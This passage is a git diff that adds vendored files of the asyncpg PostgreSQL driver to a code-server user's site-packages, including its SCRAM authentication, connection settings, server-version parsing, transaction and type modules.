sock.setsockopt(socket.IPPROTO_TCP, + socket.TCP_NODELAY, 1) + + try: + self._connect() + except Exception as ex: + transport.abort() + self.con_status = CONNECTION_BAD + self._set_state(PROTOCOL_FAILED) + self._on_error(ex) + + def connection_lost(self, exc): + self.con_status = CONNECTION_BAD + self._set_state(PROTOCOL_FAILED) + self._on_connection_lost(exc) + + def pause_writing(self): + self.writing_allowed.clear() + + def resume_writing(self): + self.writing_allowed.set() + + @property + def is_ssl(self): + return self._is_ssl + + @is_ssl.setter + def is_ssl(self, value): + self._is_ssl = value + + +class Timer: + def __init__(self, budget): + self._budget = budget + self._started = 0 + + def __enter__(self): + if self._budget is not None: + self._started = time.monotonic() + + def __exit__(self, et, e, tb): + if self._budget is not None: + self._budget -= time.monotonic() - self._started + + def get_remaining_budget(self): + return self._budget + + def has_budget_greater_than(self, amount): + if self._budget is None: + # Unlimited budget. + return True + else: + return self._budget > amount + + +class Protocol(BaseProtocol, asyncio.Protocol): + pass + + +def _create_record(object mapping, tuple elems): + # Exposed only for testing purposes. + + cdef: + object rec + int32_t i + + if mapping is None: + desc = RecordDescriptor({}, ()) + else: + desc = RecordDescriptor( + mapping, tuple(mapping) if mapping else ()) + + rec = desc.make_record(Record, len(elems)) + for i in range(len(elems)): + elem = elems[i] + cpython.Py_INCREF(elem) + recordcapi.ApgRecord_SET_ITEM(rec, i, elem) + return rec diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/record.cpython-312-x86_64-linux-gnu.so b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/record.cpython-312-x86_64-linux-gnu.so new file mode 100755 index 0000000..18c0f70 Binary files /dev/null and b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/record.cpython-312-x86_64-linux-gnu.so differ diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/record.pyi b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/record.pyi new file mode 100755 index 0000000..308f310 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/record.pyi @@ -0,0 +1,29 @@ +from typing import ( + Any, + TypeVar, + overload, +) + +from collections.abc import Iterator + + +_T = TypeVar("_T") + + +class Record: + @overload + def get(self, key: str) -> Any | None: ... + @overload + def get(self, key: str, default: _T) -> Any | _T: ... + def items(self) -> Iterator[tuple[str, Any]]: ... + def keys(self) -> Iterator[str]: ... + def values(self) -> Iterator[Any]: ... + @overload + def __getitem__(self, index: str) -> Any: ... + @overload + def __getitem__(self, index: int) -> Any: ... + @overload + def __getitem__(self, index: slice) -> tuple[Any, ...]: ... + def __iter__(self) -> Iterator[Any]: ... + def __contains__(self, x: object) -> bool: ... + def __len__(self) -> int: ... diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/recordcapi.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/recordcapi.pxd new file mode 100755 index 0000000..e52798f --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/recordcapi.pxd @@ -0,0 +1,14 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cimport cpython + + +cdef extern from "record/recordobj.h": + + void ApgRecord_SET_ITEM(object, int, object) + object RecordDescriptor(object, object) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/scram.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/scram.pxd new file mode 100755 index 0000000..5421429 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/scram.pxd @@ -0,0 +1,31 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef class SCRAMAuthentication: + cdef: + readonly bytes authentication_method + readonly bytes authorization_message + readonly bytes client_channel_binding + readonly bytes client_first_message_bare + readonly bytes client_nonce + readonly bytes client_proof + readonly bytes password_salt + readonly int password_iterations + readonly bytes server_first_message + # server_key is an instance of hmac.HAMC + readonly object server_key + readonly bytes server_nonce + + cdef create_client_first_message(self, str username) + cdef create_client_final_message(self, str password) + cdef parse_server_first_message(self, bytes server_response) + cdef verify_server_final_message(self, bytes server_final_message) + cdef _bytes_xor(self, bytes a, bytes b) + cdef _generate_client_nonce(self, int num_bytes) + cdef _generate_client_proof(self, str password) + cdef _generate_salted_password(self, str password, bytes salt, int iterations) + cdef _normalize_password(self, str original_password) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/scram.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/scram.pyx new file mode 100755 index 0000000..9b485ae --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/scram.pyx @@ -0,0 +1,341 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import base64 +import hashlib +import hmac +import re +import secrets +import stringprep +import unicodedata + + +@cython.final +cdef class SCRAMAuthentication: + """Contains the protocol for generating and a SCRAM hashed password. + + Since PostgreSQL 10, the option to hash passwords using the SCRAM-SHA-256 + method was added. This module follows the defined protocol, which can be + referenced from here: + + https://www.postgresql.org/docs/current/sasl-authentication.html#SASL-SCRAM-SHA-256 + + libpq references the following RFCs that it uses for implementation: + + * RFC 5802 + * RFC 5803 + * RFC 7677 + + The protocol works as such: + + - A client connets to the server. The server requests the client to begin + SASL authentication using SCRAM and presents a client with the methods it + supports. At present, those are SCRAM-SHA-256, and, on servers that are + built with OpenSSL and + are PG11+, SCRAM-SHA-256-PLUS (which supports channel binding, more on that + below) + + - The client sends a "first message" to the server, where it chooses which + method to authenticate with, and sends, along with the method, an indication + of channel binding (we disable for now), a nonce, and the username. + (Technically, PostgreSQL ignores the username as it already has it from the + initical connection, but we add it for completeness) + + - The server responds with a "first message" in which it extends the nonce, + as well as a password salt and the number of iterations to hash the password + with. The client validates that the new nonce contains the first part of the + client's original nonce + + - The client generates a salted password, but does not sent this up to the + server. Instead, the client follows the SCRAM algorithm (RFC5802) to + generate a proof. This proof is sent aspart of a client "final message" to + the server for it to validate. + + - The server validates the proof. If it is valid, the server sends a + verification code for the client to verify that the server came to the same + proof the client did. PostgreSQL immediately sends an AuthenticationOK + response right after a valid negotiation. If the password the client + provided was invalid, then authentication fails. + + (The beauty of this is that the salted password is never transmitted over + the wire!) + + PostgreSQL 11 added support for the channel binding (i.e. + SCRAM-SHA-256-PLUS) but to do some ongoing discussion, there is a conscious + decision by several driver authors to not support it as of yet. As such, the + channel binding parameter is hard-coded to "n" for now, but can be updated + to support other channel binding methos in the future + """ + AUTHENTICATION_METHODS = [b"SCRAM-SHA-256"] + DEFAULT_CLIENT_NONCE_BYTES = 24 + DIGEST = hashlib.sha256 + REQUIREMENTS_CLIENT_FINAL_MESSAGE = ['client_channel_binding', + 'server_nonce'] + REQUIREMENTS_CLIENT_PROOF = ['password_iterations', 'password_salt', + 'server_first_message', 'server_nonce'] + SASLPREP_PROHIBITED = ( + stringprep.in_table_a1, # PostgreSQL treats this as prohibited + stringprep.in_table_c12, + stringprep.in_table_c21_c22, + stringprep.in_table_c3, + stringprep.in_table_c4, + stringprep.in_table_c5, + stringprep.in_table_c6, + stringprep.in_table_c7, + stringprep.in_table_c8, + stringprep.in_table_c9, + ) + + def __cinit__(self, bytes authentication_method): + self.authentication_method = authentication_method + self.authorization_message = None + # channel binding is turned off for the time being + self.client_channel_binding = b"n,," + self.client_first_message_bare = None + self.client_nonce = None + self.client_proof = None + self.password_salt = None + # self.password_iterations = None + self.server_first_message = None + self.server_key = None + self.server_nonce = None + + cdef create_client_first_message(self, str username): + """Create the initial client message for SCRAM authentication""" + cdef: + bytes msg + bytes client_first_message + + self.client_nonce = \ + self._generate_client_nonce(self.DEFAULT_CLIENT_NONCE_BYTES) + # set the client first message bare here, as it's used in a later step + self.client_first_message_bare = b"n=" + username.encode("utf-8") + \ + b",r=" + self.client_nonce + # put together the full message here + msg = bytes() + msg += self.authentication_method + b"\0" + client_first_message = self.client_channel_binding + \ + self.client_first_message_bare + msg += (len(client_first_message)).to_bytes(4, byteorder='big') + \ + client_first_message + return msg + + cdef create_client_final_message(self, str password): + """Create the final client message as part of SCRAM authentication""" + cdef: + bytes msg + + if any([getattr(self, val) is None for val in + self.REQUIREMENTS_CLIENT_FINAL_MESSAGE]): + raise Exception( + "you need values from server to generate a client proof") + + # normalize the password using the SASLprep algorithm in RFC 4013 + password = self._normalize_password(password) + + # generate the client proof + self.client_proof = self._generate_client_proof(password=password) + msg = bytes() + msg += b"c=" + base64.b64encode(self.client_channel_binding) + \ + b",r=" + self.server_nonce + \ + b",p=" + base64.b64encode(self.client_proof) + return msg + + cdef parse_server_first_message(self, bytes server_response): + """Parse the response from the first message from the server""" + self.server_first_message = server_response + try: + self.server_nonce = re.search(b'r=([^,]+),', + self.server_first_message).group(1) + except IndexError: + raise Exception("could not get nonce") + if not self.server_nonce.startswith(self.client_nonce): + raise Exception("invalid nonce") + try: + self.password_salt = re.search(b',s=([^,]+),', + self.server_first_message).group(1) + except IndexError: + raise Exception("could not get salt") + try: + self.password_iterations = int(re.search(b',i=(\d+),?', + self.server_first_message).group(1)) + except (IndexError, TypeError, ValueError): + raise Exception("could not get iterations") + + cdef verify_server_final_message(self, bytes server_final_message): + """Verify the final message from the server""" + cdef: + bytes server_signature + + try: + server_signature = re.search(b'v=([^,]+)', + server_final_message).group(1) + except IndexError: + raise Exception("could not get server signature") + + verify_server_signature = hmac.new(self.server_key.digest(), + self.authorization_message, self.DIGEST) + # validate the server signature against the verifier + return server_signature == base64.b64encode( + verify_server_signature.digest()) + + cdef _bytes_xor(self, bytes a, bytes b): + """XOR two bytestrings together""" + return bytes(a_i ^ b_i for a_i, b_i in zip(a, b)) + + cdef _generate_client_nonce(self, int num_bytes): + cdef: + bytes token + + token = secrets.token_bytes(num_bytes) + + return base64.b64encode(token) + + cdef _generate_client_proof(self, str password): + """need to ensure a server response exists, i.e. """ + cdef: + bytes salted_password + + if any([getattr(self, val) is None for val in + self.REQUIREMENTS_CLIENT_PROOF]): + raise Exception( + "you need values from server to generate a client proof") + # generate a salt password + salted_password = self._generate_salted_password(password, + self.password_salt, self.password_iterations) + # client key is derived from the salted password + client_key = hmac.new(salted_password, b"Client Key", self.DIGEST) + # this allows us to compute the stored key that is residing on the server + stored_key = self.DIGEST(client_key.digest()) + # as well as compute the server key + self.server_key = hmac.new(salted_password, b"Server Key", self.DIGEST) + # build the authorization message that will be used in the + # client signature + # the "c=" portion is for the channel binding, but this is not + # presently implemented + self.authorization_message = self.client_first_message_bare + b"," + \ + self.server_first_message + b",c=" + \ + base64.b64encode(self.client_channel_binding) + \ + b",r=" + self.server_nonce + # sign! + client_signature = hmac.new(stored_key.digest(), + self.authorization_message, self.DIGEST) + # and the proof + return self._bytes_xor(client_key.digest(), client_signature.digest()) + + cdef _generate_salted_password(self, str password, bytes salt, int iterations): + """This follows the "Hi" algorithm specified in RFC5802""" + cdef: + bytes p + bytes s + bytes u + + # convert the password to a binary string - UTF8 is safe for SASL + # (though there are SASLPrep rules) + p = password.encode("utf8") + # the salt needs to be base64 decoded -- full binary must be used + s = base64.b64decode(salt) + # the initial signature is the salt with a terminator of a 32-bit string + # ending in 1 + ui = hmac.new(p, s + b'\x00\x00\x00\x01', self.DIGEST) + # grab the initial digest + u = ui.digest() + # for X number of iterations, recompute the HMAC signature against the + # password and the latest iteration of the hash, and XOR it with the + # previous version + for x in range(iterations - 1): + ui = hmac.new(p, ui.digest(), hashlib.sha256) + # this is a fancy way of XORing two byte strings together + u = self._bytes_xor(u, ui.digest()) + return u + + cdef _normalize_password(self, str original_password): + """Normalize the password using the SASLprep from RFC4013""" + cdef: + str normalized_password + + # Note: Per the PostgreSQL documentation, PostgreSWL does not require + # UTF-8 to be used for the password, but will perform SASLprep on the + # password regardless. + # If the password is not valid UTF-8, PostgreSQL will then **not** use + # SASLprep processing. + # If the password fails SASLprep, the password should still be sent + # See: https://www.postgresql.org/docs/current/sasl-authentication.html + # and + # https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/common/saslprep.c + # using the `pg_saslprep` function + normalized_password = original_password + # if the original password is an ASCII string or fails to encode as a + # UTF-8 string, then no further action is needed + try: + original_password.encode("ascii") + except UnicodeEncodeError: + pass + else: + return original_password + + # Step 1 of SASLPrep: Map. Per the algorithm, we map non-ascii space + # characters to ASCII spaces (\x20 or \u0020, but we will use ' ') and + # commonly mapped to nothing characters are removed + # Table C.1.2 -- non-ASCII spaces + # Table B.1 -- "Commonly mapped to nothing" + normalized_password = u"".join( + ' ' if stringprep.in_table_c12(c) else c + for c in tuple(normalized_password) if not stringprep.in_table_b1(c) + ) + + # If at this point the password is empty, PostgreSQL uses the original + # password + if not normalized_password: + return original_password + + # Step 2 of SASLPrep: Normalize. Normalize the password using the + # Unicode normalization algorithm to NFKC form + normalized_password = unicodedata.normalize('NFKC', normalized_password) + + # If the password is not empty, PostgreSQL uses the original password + if not normalized_password: + return original_password + + normalized_password_tuple = tuple(normalized_password) + + # Step 3 of SASLPrep: Prohobited characters. If PostgreSQL detects any + # of the prohibited characters in SASLPrep, it will use the original + # password + # We also include "unassigned code points" in the prohibited character + # category as PostgreSQL does the same + for c in normalized_password_tuple: + if any( + in_prohibited_table(c) + for in_prohibited_table in self.SASLPREP_PROHIBITED + ): + return original_password + + # Step 4 of SASLPrep: Bi-directional characters. PostgreSQL follows the + # rules for bi-directional characters laid on in RFC3454 Sec. 6 which + # are: + # 1. Characters in RFC 3454 Sec 5.8 are prohibited (C.8) + # 2. If a string contains a RandALCat character, it cannot containy any + # LCat character + # 3. If the string contains any RandALCat character, an RandALCat + # character must be the first and last character of the string + # RandALCat characters are found in table D.1, whereas LCat are in D.2 + if any(stringprep.in_table_d1(c) for c in normalized_password_tuple): + # if the first character or the last character are not in D.1, + # return the original password + if not (stringprep.in_table_d1(normalized_password_tuple[0]) and + stringprep.in_table_d1(normalized_password_tuple[-1])): + return original_password + + # if any characters are in D.2, use the original password + if any( + stringprep.in_table_d2(c) for c in normalized_password_tuple + ): + return original_password + + # return the normalized password + return normalized_password diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/settings.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/settings.pxd new file mode 100755 index 0000000..0a1a5f6 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/settings.pxd @@ -0,0 +1,30 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef class ConnectionSettings(pgproto.CodecContext): + cdef: + str _encoding + object _codec + dict _settings + bint _is_utf8 + DataCodecConfig _data_codecs + + cdef add_setting(self, str name, str val) + cdef is_encoding_utf8(self) + cpdef get_text_codec(self) + cpdef inline register_data_types(self, types) + cpdef inline add_python_codec( + self, typeoid, typename, typeschema, typeinfos, typekind, encoder, + decoder, format) + cpdef inline remove_python_codec( + self, typeoid, typename, typeschema) + cpdef inline clear_type_cache(self) + cpdef inline set_builtin_type_codec( + self, typeoid, typename, typeschema, typekind, alias_to, format) + cpdef inline Codec get_data_codec( + self, uint32_t oid, ServerDataFormat format=*, + bint ignore_custom_codec=*) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/settings.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/settings.pyx new file mode 100755 index 0000000..2b53566 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/settings.pyx @@ -0,0 +1,106 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from asyncpg import exceptions + + +@cython.final +cdef class ConnectionSettings(pgproto.CodecContext): + + def __cinit__(self): + self._encoding = 'utf-8' + self._is_utf8 = True + self._settings = {} + self._codec = codecs.lookup('utf-8') + self._data_codecs = DataCodecConfig() + + cdef add_setting(self, str name, str val): + self._settings[name] = val + if name == 'client_encoding': + py_enc = get_python_encoding(val) + self._codec = codecs.lookup(py_enc) + self._encoding = self._codec.name + self._is_utf8 = self._encoding == 'utf-8' + + cdef is_encoding_utf8(self): + return self._is_utf8 + + cpdef get_text_codec(self): + return self._codec + + cpdef inline register_data_types(self, types): + self._data_codecs.add_types(types) + + cpdef inline add_python_codec(self, typeoid, typename, typeschema, + typeinfos, typekind, encoder, decoder, + format): + cdef: + ServerDataFormat _format + ClientExchangeFormat xformat + + if format == 'binary': + _format = PG_FORMAT_BINARY + xformat = PG_XFORMAT_OBJECT + elif format == 'text': + _format = PG_FORMAT_TEXT + xformat = PG_XFORMAT_OBJECT + elif format == 'tuple': + _format = PG_FORMAT_ANY + xformat = PG_XFORMAT_TUPLE + else: + raise exceptions.InterfaceError( + 'invalid `format` argument, expected {}, got {!r}'.format( + "'text', 'binary' or 'tuple'", format + )) + + self._data_codecs.add_python_codec(typeoid, typename, typeschema, + typekind, typeinfos, + encoder, decoder, + _format, xformat) + + cpdef inline remove_python_codec(self, typeoid, typename, typeschema): + self._data_codecs.remove_python_codec(typeoid, typename, typeschema) + + cpdef inline clear_type_cache(self): + self._data_codecs.clear_type_cache() + + cpdef inline set_builtin_type_codec(self, typeoid, typename, typeschema, + typekind, alias_to, format): + cdef: + ServerDataFormat _format + + if format is None: + _format = PG_FORMAT_ANY + elif format == 'binary': + _format = PG_FORMAT_BINARY + elif format == 'text': + _format = PG_FORMAT_TEXT + else: + raise exceptions.InterfaceError( + 'invalid `format` argument, expected {}, got {!r}'.format( + "'text' or 'binary'", format + )) + + self._data_codecs.set_builtin_type_codec(typeoid, typename, typeschema, + typekind, alias_to, _format) + + cpdef inline Codec get_data_codec(self, uint32_t oid, + ServerDataFormat format=PG_FORMAT_ANY, + bint ignore_custom_codec=False): + return self._data_codecs.get_codec(oid, format, ignore_custom_codec) + + def __getattr__(self, name): + if not name.startswith('_'): + try: + return self._settings[name] + except KeyError: + raise AttributeError(name) from None + + return object.__getattribute__(self, name) + + def __repr__(self): + return ''.format(self._settings) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/serverversion.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/serverversion.py new file mode 100755 index 0000000..ee9647b --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/serverversion.py @@ -0,0 +1,70 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +import re +import typing + +from .types import ServerVersion + +version_regex: typing.Final = re.compile( + r"(Postgre[^\s]*)?\s*" + r"(?P[0-9]+)\.?" + r"((?P[0-9]+)\.?)?" + r"(?P[0-9]+)?" + r"(?P[a-z]+)?" + r"(?P[0-9]+)?" +) + + +class _VersionDict(typing.TypedDict): + major: int + minor: int | None + micro: int | None + releaselevel: str | None + serial: int | None + + +def split_server_version_string(version_string: str) -> ServerVersion: + version_match = version_regex.search(version_string) + + if version_match is None: + raise ValueError( + "Unable to parse Postgres " + f'version from "{version_string}"' + ) + + version: _VersionDict = version_match.groupdict() # type: ignore[assignment] # noqa: E501 + for ver_key, ver_value in version.items(): + # Cast all possible versions parts to int + try: + version[ver_key] = int(ver_value) # type: ignore[literal-required, call-overload] # noqa: E501 + except (TypeError, ValueError): + pass + + if version["major"] < 10: + return ServerVersion( + version["major"], + version.get("minor") or 0, + version.get("micro") or 0, + version.get("releaselevel") or "final", + version.get("serial") or 0, + ) + + # Since PostgreSQL 10 the versioning scheme has changed. + # 10.x really means 10.0.x. While parsing 10.1 + # as (10, 1) may seem less confusing, in practice most + # version checks are written as version[:2], and we + # want to keep that behaviour consistent, i.e not fail + # a major version check due to a bugfix release. + return ServerVersion( + version["major"], + 0, + version.get("minor") or 0, + version.get("releaselevel") or "final", + version.get("serial") or 0, + ) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/transaction.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/transaction.py new file mode 100755 index 0000000..562811e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/transaction.py @@ -0,0 +1,246 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import enum + +from . import connresource +from . import exceptions as apg_errors + + +class TransactionState(enum.Enum): + NEW = 0 + STARTED = 1 + COMMITTED = 2 + ROLLEDBACK = 3 + FAILED = 4 + + +ISOLATION_LEVELS = { + 'read_committed', + 'read_uncommitted', + 'serializable', + 'repeatable_read', +} +ISOLATION_LEVELS_BY_VALUE = { + 'read committed': 'read_committed', + 'read uncommitted': 'read_uncommitted', + 'serializable': 'serializable', + 'repeatable read': 'repeatable_read', +} + + +class Transaction(connresource.ConnectionResource): + """Represents a transaction or savepoint block. + + Transactions are created by calling the + :meth:`Connection.transaction() ` + function. + """ + + __slots__ = ('_connection', '_isolation', '_readonly', '_deferrable', + '_state', '_nested', '_id', '_managed') + + def __init__(self, connection, isolation, readonly, deferrable): + super().__init__(connection) + + if isolation and isolation not in ISOLATION_LEVELS: + raise ValueError( + 'isolation is expected to be either of {}, ' + 'got {!r}'.format(ISOLATION_LEVELS, isolation)) + + self._isolation = isolation + self._readonly = readonly + self._deferrable = deferrable + self._state = TransactionState.NEW + self._nested = False + self._id = None + self._managed = False + + async def __aenter__(self): + if self._managed: + raise apg_errors.InterfaceError( + 'cannot enter context: already in an `async with` block') + self._managed = True + await self.start() + + async def __aexit__(self, extype, ex, tb): + try: + self._check_conn_validity('__aexit__') + except apg_errors.InterfaceError: + if extype is GeneratorExit: + # When a PoolAcquireContext is being exited, and there + # is an open transaction in an async generator that has + # not been iterated fully, there is a possibility that + # Pool.release() would race with this __aexit__(), since + # both would be in concurrent tasks. In such case we + # yield to Pool.release() to do the ROLLBACK for us. + # See https://github.com/MagicStack/asyncpg/issues/232 + # for an example. + return + else: + raise + + try: + if extype is not None: + await self.__rollback() + else: + await self.__commit() + finally: + self._managed = False + + @connresource.guarded + async def start(self): + """Enter the transaction or savepoint block.""" + self.__check_state_base('start') + if self._state is TransactionState.STARTED: + raise apg_errors.InterfaceError( + 'cannot start; the transaction is already started') + + con = self._connection + + if con._top_xact is None: + if con._protocol.is_in_transaction(): + raise apg_errors.InterfaceError( + 'cannot use Connection.transaction() in ' + 'a manually started transaction') + con._top_xact = self + else: + # Nested transaction block + if self._isolation: + top_xact_isolation = con._top_xact._isolation + if top_xact_isolation is None: + top_xact_isolation = ISOLATION_LEVELS_BY_VALUE[ + await self._connection.fetchval( + 'SHOW transaction_isolation;')] + if self._isolation != top_xact_isolation: + raise apg_errors.InterfaceError( + 'nested transaction has a different isolation level: ' + 'current {!r} != outer {!r}'.format( + self._isolation, top_xact_isolation)) + self._nested = True + + if self._nested: + self._id = con._get_unique_id('savepoint') + query = 'SAVEPOINT {};'.format(self._id) + else: + query = 'BEGIN' + if self._isolation == 'read_committed': + query += ' ISOLATION LEVEL READ COMMITTED' + elif self._isolation == 'read_uncommitted': + query += ' ISOLATION LEVEL READ UNCOMMITTED' + elif self._isolation == 'repeatable_read': + query += ' ISOLATION LEVEL REPEATABLE READ' + elif self._isolation == 'serializable': + query += ' ISOLATION LEVEL SERIALIZABLE' + if self._readonly: + query += ' READ ONLY' + if self._deferrable: + query += ' DEFERRABLE' + query += ';' + + try: + await self._connection.execute(query) + except BaseException: + self._state = TransactionState.FAILED + raise + else: + self._state = TransactionState.STARTED + + def __check_state_base(self, opname): + if self._state is TransactionState.COMMITTED: + raise apg_errors.InterfaceError( + 'cannot {}; the transaction is already committed'.format( + opname)) + if self._state is TransactionState.ROLLEDBACK: + raise apg_errors.InterfaceError( + 'cannot {}; the transaction is already rolled back'.format( + opname)) + if self._state is TransactionState.FAILED: + raise apg_errors.InterfaceError( + 'cannot {}; the transaction is in error state'.format( + opname)) + + def __check_state(self, opname): + if self._state is not TransactionState.STARTED: + if self._state is TransactionState.NEW: + raise apg_errors.InterfaceError( + 'cannot {}; the transaction is not yet started'.format( + opname)) + self.__check_state_base(opname) + + async def __commit(self): + self.__check_state('commit') + + if self._connection._top_xact is self: + self._connection._top_xact = None + + if self._nested: + query = 'RELEASE SAVEPOINT {};'.format(self._id) + else: + query = 'COMMIT;' + + try: + await self._connection.execute(query) + except BaseException: + self._state = TransactionState.FAILED + raise + else: + self._state = TransactionState.COMMITTED + + async def __rollback(self): + self.__check_state('rollback') + + if self._connection._top_xact is self: + self._connection._top_xact = None + + if self._nested: + query = 'ROLLBACK TO {};'.format(self._id) + else: + query = 'ROLLBACK;' + + try: + await self._connection.execute(query) + except BaseException: + self._state = TransactionState.FAILED + raise + else: + self._state = TransactionState.ROLLEDBACK + + @connresource.guarded + async def commit(self): + """Exit the transaction or savepoint block and commit changes.""" + if self._managed: + raise apg_errors.InterfaceError( + 'cannot manually commit from within an `async with` block') + await self.__commit() + + @connresource.guarded + async def rollback(self): + """Exit the transaction or savepoint block and rollback changes.""" + if self._managed: + raise apg_errors.InterfaceError( + 'cannot manually rollback from within an `async with` block') + await self.__rollback() + + def __repr__(self): + attrs = [] + attrs.append('state:{}'.format(self._state.name.lower())) + + if self._isolation is not None: + attrs.append(self._isolation) + if self._readonly: + attrs.append('readonly') + if self._deferrable: + attrs.append('deferrable') + + if self.__class__.__module__.startswith('asyncpg.'): + mod = 'asyncpg' + else: + mod = self.__class__.__module__ + + return '<{}.{} {} {:#x}>'.format( + mod, self.__class__.__name__, ' '.join(attrs), id(self)) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/types.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/types.py new file mode 100755 index 0000000..c4b66b4 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/types.py @@ -0,0 +1,223 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +import typing + +from asyncpg.pgproto.types import ( + BitString, Point, Path, Polygon, + Box, Line, LineSegment, Circle, +) + +if typing.TYPE_CHECKING: + from typing_extensions import Self + + +__all__ = ( + 'Type', 'Attribute', 'Range', 'BitString', 'Point', 'Path', 'Polygon', + 'Box', 'Line', 'LineSegment', 'Circle', 'ServerVersion', +) + + +class Type(typing.NamedTuple): + oid: int + name: str + kind: str + schema: str + + +Type.__doc__ = 'Database data type.' +Type.oid.__doc__ = 'OID of the type.' +Type.name.__doc__ = 'Type name. For example "int2".' +Type.kind.__doc__ = \ + 'Type kind. Can be "scalar", "array", "composite" or "range".' +Type.schema.__doc__ = 'Name of the database schema that defines the type.' + + +class Attribute(typing.NamedTuple): + name: str + type: Type + + +Attribute.__doc__ = 'Database relation attribute.' +Attribute.name.__doc__ = 'Attribute name.' +Attribute.type.__doc__ = 'Attribute data type :class:`asyncpg.types.Type`.' + + +class ServerVersion(typing.NamedTuple): + major: int + minor: int + micro: int + releaselevel: str + serial: int + + +ServerVersion.__doc__ = 'PostgreSQL server version tuple.' + + +class _RangeValue(typing.Protocol): + def __eq__(self, __value: object) -> bool: + ... + + def __lt__(self, __other: Self, /) -> bool: + ... + + def __gt__(self, __other: Self, /) -> bool: + ... + + +_RV = typing.TypeVar('_RV', bound=_RangeValue) + + +class Range(typing.Generic[_RV]): + """Immutable representation of PostgreSQL `range` type.""" + + __slots__ = ('_lower', '_upper', '_lower_inc', '_upper_inc', '_empty') + + _lower: _RV | None + _upper: _RV | None + _lower_inc: bool + _upper_inc: bool + _empty: bool + + def __init__( + self, + lower: _RV | None = None, + upper: _RV | None = None, + *, + lower_inc: bool = True, + upper_inc: bool = False, + empty: bool = False + ) -> None: + self._empty = empty + if empty: + self._lower = self._upper = None + self._lower_inc = self._upper_inc = False + else: + self._lower = lower + self._upper = upper + self._lower_inc = lower is not None and lower_inc + self._upper_inc = upper is not None and upper_inc + + @property + def lower(self) -> _RV | None: + return self._lower + + @property + def lower_inc(self) -> bool: + return self._lower_inc + + @property + def lower_inf(self) -> bool: + return self._lower is None and not self._empty + + @property + def upper(self) -> _RV | None: + return self._upper + + @property + def upper_inc(self) -> bool: + return self._upper_inc + + @property + def upper_inf(self) -> bool: + return self._upper is None and not self._empty + + @property + def isempty(self) -> bool: + return self._empty + + def _issubset_lower(self, other: Self) -> bool: + if other._lower is None: + return True + if self._lower is None: + return False + + return self._lower > other._lower or ( + self._lower == other._lower + and (other._lower_inc or not self._lower_inc) + ) + + def _issubset_upper(self, other: Self) -> bool: + if other._upper is None: + return True + if self._upper is None: + return False + + return self._upper < other._upper or ( + self._upper == other._upper + and (other._upper_inc or not self._upper_inc) + ) + + def issubset(self, other: Self) -> bool: + if self._empty: + return True + if other._empty: + return False + + return self._issubset_lower(other) and self._issubset_upper(other) + + def issuperset(self, other: Self) -> bool: + return other.issubset(self) + + def __bool__(self) -> bool: + return not self._empty + + def __eq__(self, other: object) -> bool: + if not isinstance(other, Range): + return NotImplemented + + return ( + self._lower, + self._upper, + self._lower_inc, + self._upper_inc, + self._empty + ) == ( + other._lower, # pyright: ignore [reportUnknownMemberType] + other._upper, # pyright: ignore [reportUnknownMemberType] + other._lower_inc, + other._upper_inc, + other._empty + ) + + 